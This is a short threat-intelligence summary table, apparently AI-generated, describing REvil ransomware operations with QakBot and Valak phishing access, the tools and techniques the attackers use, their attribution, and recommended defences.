| Category | Details |
|---|---|
| Threat Actors | Sodinokibi (REvil), QakBot operators, Valak operators, Ransomware affiliates |
| Campaign Overview | Ransomware actors specialize in phishing-based initial access (e.g., QakBot, Valak), followed by data exfiltration and ransomware deployment to extort victims. Collaboration among threat actors enhances their operations. |
| Target Regions (Victims) | Enterprises with valuable data (e.g., financial, IP, healthcare, HR, and backup data) across multiple industries. |
| Methodology | Phishing emails with malicious Office documents (Excel, Word); use of tools like QakBot, Valak, Cobalt Strike, Rclone, and plink.exe for reconnaissance, lateral movement, and data exfiltration. |
| Product Targeted | Systems with Microsoft Office, Active Directory, and critical internal file shares. |
| Malware Reference | QakBot, Valak, Sodinokibi ransomware |
| Tools Used | Cobalt Strike, NetSupport Manager, Mimikatz, Rclone, MegaSync, MegaCmd, WinSCP, AdFind, nltest, plink.exe, ngrok.exe |
| Vulnerabilities Exploited | Use of phishing techniques and credential harvesting to bypass protections; exploitation of tools inherent to systems (e.g., SMB protocol, RDP tunneling). |
| TTPs | Double extortion, phishing campaigns, lateral movement (e.g., PowerShell payloads, SCM, and admin shares), credential harvesting, RDP tunneling, and GPO misuse for ransomware deployment. |
| Attribution | Eastern European cybercrime origin; collaboration among ransomware groups like Egregor, Clop, Ryuk, DoppelPaymer. |
| Recommendations | Implement EDR, LAPS, SMB hardening, MFA, PAM, internal network segmentation, vulnerability management, and restrict admin privileges. |
| Source | Security Intelligence |
Read full article: Read More
Disclaimer: The above summary has been generated by an AI language model.
Leave a Reply